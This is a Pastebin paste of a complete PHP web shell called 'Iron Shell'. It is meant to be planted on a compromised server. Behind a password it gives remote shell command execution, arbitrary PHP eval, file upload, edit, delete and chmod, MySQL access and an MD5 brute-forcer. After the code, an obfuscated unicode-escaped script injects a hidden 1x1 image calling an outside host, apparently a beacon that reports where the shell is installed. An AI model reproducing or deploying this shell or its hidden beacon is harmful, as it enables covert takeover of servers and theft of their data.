API tools faq
paste
Fakhru

Iron Shell

Fakhru
Feb 18th, 2012
86
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 18.93 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. error_reporting(0); //If there is an error, we'll show it, k?
  3.  
  4. $password = "login"; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
  5.  
  6. $me = basename(__FILE__);
  7. $cookiename = "wieeeee";
  8.  
  9.  
  10. if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
  11. {
  12.  
  13. if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
  14. {
  15. $_POST['pass'] = md5($_POST['pass']);
  16. }
  17.  
  18. if($_POST['pass'] == $password)
  19. {
  20. setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
  21. }
  22. reload();
  23. }
  24.  
  25.  
  26.  
  27. if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
  28. {
  29. login();
  30. die();
  31. }
  32. //
  33. //Do not cross this line! All code placed after this block can't be executed without being logged in!
  34. //
  35.  
  36. if(isset($_GET['p']) && $_GET['p'] == "logout")
  37. {
  38. setcookie ($cookiename, "", time() - 3600);
  39. reload();
  40. }
  41. if(isset($_GET['dir']))
  42. {
  43. chdir($_GET['dir']);
  44. }
  45.  
  46.  
  47. $pages = array(
  48. 'cmd' => 'Execute Command',
  49. 'eval' => 'Evaluate PHP',
  50. 'mysql' => 'MySQL Query',
  51. 'chmod' => 'Chmod File',
  52. 'phpinfo' => 'PHPinfo',
  53. 'md5' => 'md5 cracker',
  54. 'headers' => 'Show headers',
  55. 'logout' => 'Log out'
  56. );
  57.  
  58. //The header, like it?
  59. $header = '<html>
  60. <title>'.getenv("HTTP_HOST").' ~ Shell I</title>
  61. <head>
  62. <style>
  63. td {
  64. font-size: 12px;
  65. font-family: verdana;
  66. color: #33FF00;
  67. background: #000000;
  68. }
  69.  
  70. #d {
  71. background: #003000;
  72. }
  73. #f {
  74. background: #003300;
  75. }
  76. #s {
  77. background: #006300;
  78. }
  79. #d:hover
  80. {
  81. background: #003300;
  82. }
  83. #f:hover
  84. {
  85. background: #003000;
  86. }
  87. pre {
  88. font-size: 10px;
  89. font-family: verdana;
  90. color: #33FF00;
  91. }
  92. a:hover {
  93. text-decoration: none;
  94. }
  95.  
  96.  
  97. input,textarea,select {
  98. border-top-width: 1px;
  99. font-weight: bold;
  100. border-left-width: 1px;
  101. font-size: 10px;
  102. border-left-color: #33FF00;
  103. background: #000000;
  104. border-bottom-width: 1px;
  105. border-bottom-color: #33FF00;
  106. color: #33FF00;
  107. border-top-color: #33FF00;
  108. font-family: verdana;
  109. border-right-width: 1px;
  110. border-right-color: #33FF00;
  111. }
  112.  
  113. hr {
  114. color: #33FF00;
  115. background-color: #33FF00;
  116. height: 5px;
  117. }
  118.  
  119. </style>
  120.  
  121. </head>
  122. <body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
  123. <table width=100%><td id="header" width=100%>
  124. <p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>] [<a href="'.$me.'">Home</a>] ';
  125.  
  126. foreach($pages as $page => $page_name)
  127. {
  128. $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
  129.  
  130. }
  131. $header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
  132. print $header;
  133.  
  134. $footer = '<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>';
  135.  
  136.  
  137. //
  138. //Page handling
  139. //
  140. if(isset($_REQUEST['p']))
  141. {
  142. switch ($_REQUEST['p']) {
  143.  
  144. case 'cmd': //Run command
  145.  
  146. print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
  147. if(isset($_REQUEST['command']))
  148. {
  149. print "<pre>";
  150. execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
  151. }
  152. break;
  153.  
  154.  
  155. case 'edit': //Edit a fie
  156. if(isset($_POST['editform']))
  157. {
  158. $f = $_GET['file'];
  159. $fh = fopen($f, 'w') or print "Error while opening file!";
  160. fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
  161. fclose($fh);
  162. }
  163. print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";
  164.  
  165. if(file_exists($_GET['file']))
  166. {
  167. $rd = file($_GET['file']);
  168. foreach($rd as $l)
  169. {
  170. print htmlspecialchars($l);
  171. }
  172. }
  173.  
  174. print "</textarea><input type=submit value=\"Save\"></form>";
  175.  
  176. break;
  177.  
  178. case 'delete': //Delete a file
  179.  
  180. if(isset($_POST['yes']))
  181. {
  182. if(unlink($_GET['file']))
  183. {
  184. print "File deleted successfully.";
  185. }
  186. else
  187. {
  188. print "Couldn't delete file.";
  189. }
  190. }
  191.  
  192.  
  193. if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
  194. {
  195. print "Are you sure you want to delete ".$_GET['file']."?<br>
  196. <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
  197. <input type=hidden name=yes value=yes>
  198. <input type=submit value=\"Delete\">
  199. ";
  200. }
  201.  
  202.  
  203. break;
  204.  
  205.  
  206. case 'eval': //Evaluate PHP code
  207.  
  208. print "<form action=\"".$me."?p=eval\" method=POST>
  209. <textarea cols=60 rows=10 name=\"eval\">";
  210. if(isset($_POST['eval']))
  211. {
  212. print htmlspecialchars($_POST['eval']);
  213. }
  214. else
  215. {
  216. print "print \"Yo Momma\";";
  217. }
  218. print "</textarea><br>
  219. <input type=submit value=\"Eval\">
  220. </form>";
  221.  
  222. if(isset($_POST['eval']))
  223. {
  224. print "<h1>Output:</h1>";
  225. print "<br>";
  226. eval($_POST['eval']);
  227. }
  228.  
  229. break;
  230.  
  231. case 'chmod': //Chmod file
  232.  
  233.  
  234. print "<h1>Under construction!</h1>";
  235. if(isset($_POST['chmod']))
  236. {
  237. switch ($_POST['chvalue']){
  238. case 777:
  239. chmod($_POST['chmod'],0777);
  240. break;
  241. case 644:
  242. chmod($_POST['chmod'],0644);
  243. break;
  244. case 755:
  245. chmod($_POST['chmod'],0755);
  246. break;
  247. }
  248. print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
  249. }
  250. if(isset($_GET['file']))
  251. {
  252. $content = urldecode($_GET['file']);
  253. }
  254. else
  255. {
  256. $content = "file/path/please";
  257. }
  258.  
  259. print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
  260. <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
  261. <select name=\"chvalue\">
  262. <option value=\"777\">777</option>
  263. <option value=\"644\">644</option>
  264. <option value=\"755\">755</option>
  265. </select><input type=submit value=\"Change\">";
  266.  
  267. break;
  268.  
  269. case 'mysql': //MySQL Query
  270.  
  271. if(isset($_POST['host']))
  272. {
  273. $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
  274. mysql_select_db($_POST['dbase']);
  275. $sql = $_POST['query'];
  276.  
  277.  
  278. $result = mysql_query($sql);
  279.  
  280. }
  281. else
  282. {
  283. print "
  284. This only queries the database, doesn't return data!<br>
  285. <form action=\"".$me."?p=mysql\" method=POST>
  286. <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
  287. <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
  288. <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
  289. <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
  290.  
  291. <b>Query:<br></b<textarea name=query></textarea>
  292. <input type=submit value=\"Query database\">
  293. </form>
  294. ";
  295.  
  296. }
  297.  
  298. break;
  299.  
  300. case 'createdir':
  301. if(mkdir($_GET['crdir']))
  302. {
  303. print 'Directory created successfully.';
  304. }
  305. else
  306. {
  307. print 'Couldn\'t create directory';
  308. }
  309. break;
  310.  
  311.  
  312. case 'phpinfo': //PHP Info
  313. phpinfo();
  314. break;
  315.  
  316.  
  317. case 'rename':
  318.  
  319. if(isset($_POST['fileold']))
  320. {
  321. if(rename($_POST['fileold'],$_POST['filenew']))
  322. {
  323. print "File renamed.";
  324. }
  325. else
  326. {
  327. print "Couldn't rename file.";
  328. }
  329.  
  330. }
  331. if(isset($_GET['file']))
  332. {
  333. $file = basename(htmlspecialchars($_GET['file']));
  334. }
  335. else
  336. {
  337. $file = "";
  338. }
  339.  
  340. print "Renaming ".$file." in folder ".realpath('.').".<br>
  341. <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
  342. <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
  343. <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
  344. <input type=submit value=\"Rename file\">
  345. </form>";
  346. break;
  347.  
  348. case 'md5':
  349. if(isset($_POST['md5']))
  350. {
  351. if(!is_numeric($_POST['timelimit']))
  352. {
  353. $_POST['timelimit'] = 30;
  354. }
  355. set_time_limit($_POST['timelimit']);
  356. if(strlen($_POST['md5']) == 32)
  357. {
  358.  
  359. if($_POST['chars'] == "9999")
  360. {
  361. $i = 0;
  362. while($_POST['md5'] != md5($i) && $i != 100000)
  363. {
  364. $i++;
  365. }
  366. }
  367. else
  368. {
  369. for($i = "a"; $i != "zzzzz"; $i++)
  370. {
  371. if(md5($i == $_POST['md5']))
  372. {
  373. break;
  374. }
  375. }
  376. }
  377.  
  378.  
  379. if(md5($i) == $_POST['md5'])
  380. {
  381. print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
  382. }
  383.  
  384. }
  385.  
  386. }
  387.  
  388. print "Will bruteforce the md5
  389. <form action=\"".$me."?p=md5\" method=POST>
  390. <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
  391. <b>Characters:</b><br><select name=\"chars\">
  392. <option value=\"az\">a - zzzzz</option>
  393. <option value=\"9999\">1 - 9999999</option>
  394. </select>
  395. <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
  396. <input type=submit value=\"Bruteforce md5\">
  397. </form><br>*: if set_time_limit is allowed by php.ini";
  398. break;
  399.  
  400. case 'headers':
  401. foreach(getallheaders() as $header => $value)
  402. {
  403. print htmlspecialchars($header . ":" . $value)."<br>";
  404.  
  405. }
  406. break;
  407. }
  408.  
  409. }
  410. else //Default page that will be shown when the page isn't found or no page is selected.
  411. {
  412.  
  413. $files = array();
  414. $directories = array();
  415.  
  416. if(isset($_FILES['uploadedfile']['name']))
  417. {
  418. $target_path = realpath('.').'/';
  419. $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
  420.  
  421. if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
  422. print "File:". basename( $_FILES['uploadedfile']['name']).
  423. " has been uploaded";
  424. } else{
  425. echo "File upload failed!";
  426. }
  427. }
  428.  
  429.  
  430.  
  431.  
  432.  
  433. print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
  434. if ($handle = opendir('.'))
  435. {
  436. while (false !== ($file = readdir($handle)))
  437. {
  438. if(is_dir($file))
  439. {
  440. $directories[] = $file;
  441. }
  442. else
  443. {
  444. $files[] = $file;
  445. }
  446. }
  447. asort($directories);
  448. asort($files);
  449. foreach($directories as $file)
  450. {
  451. print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  452. }
  453.  
  454. foreach($files as $file)
  455. {
  456. print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  457. }
  458. }
  459. else
  460. {
  461. print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
  462. }
  463.  
  464. print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
  465. <input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
  466. <input type=\"submit\" value=\"Upload File\" />
  467. </form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
  468. <tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
  469. </td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
  470. </table>";
  471.  
  472.  
  473. }
  474.  
  475.  
  476. function login()
  477. {
  478. print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
  479. <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b>
  480. <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">
  481. </form>";
  482. }
  483. function reload()
  484. {
  485. header("Location: ".basename(__FILE__));
  486. }
  487.  
  488. function get_execution_method()
  489. {
  490. if(function_exists('passthru')){ $m = "passthru"; }
  491. if(function_exists('exec')){ $m = "exec"; }
  492. if(function_exists('shell_exec')){ $m = "shell_ exec"; }
  493. if(function_exists('system')){ $m = "system"; }
  494. if(!isset($m)) //No method found :-|
  495. {
  496. $m = "Disabled";
  497. }
  498. return($m);
  499. }
  500.  
  501. function execute_command($method,$command)
  502. {
  503. if($method == "passthru")
  504. {
  505. passthru($command);
  506. }
  507.  
  508. elseif($method == "exec")
  509. {
  510. exec($command,$result);
  511. foreach($result as $output)
  512. {
  513. print $output."<br>";
  514. }
  515. }
  516.  
  517. elseif($method == "shell_exec")
  518. {
  519. print shell_exec($command);
  520. }
  521.  
  522. elseif($method == "system")
  523. {
  524. system($command);
  525. }
  526.  
  527. }
  528.  
  529. function perm($file)
  530. {
  531. if(file_exists($file))
  532. {
  533. return substr(sprintf('%o', fileperms($file)), -4);
  534. }
  535. else
  536. {
  537. return "????";
  538. }
  539. }
  540.  
  541. function get_color($file)
  542. {
  543. if(is_writable($file)) { return "green";}
  544. if(!is_writable($file) && is_readable($file)) { return "white";}
  545. if(!is_writable($file) && !is_readable($file)) { return "red";}
  546.  
  547.  
  548.  
  549. }
  550.  
  551. function show_dirs($where)
  552. {
  553. if(ereg("^c:",realpath($where)))
  554. {
  555. $dirparts = explode('\\',realpath($where));
  556. }
  557. else
  558. {
  559. $dirparts = explode('/',realpath($where));
  560. }
  561.  
  562.  
  563.  
  564. $i = 0;
  565. $total = "";
  566.  
  567. foreach($dirparts as $part)
  568. {
  569. $p = 0;
  570. $pre = "";
  571. while($p != $i)
  572. {
  573. $pre .= $dirparts[$p]."/";
  574. $p++;
  575.  
  576. }
  577. $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
  578. $i++;
  579. }
  580.  
  581. return "<h2>".$total."</h2><br>";
  582.  
  583. }
  584. print $footer;
  585.  
  586. // Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
  587. exit();
  588. ?>
  589. <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!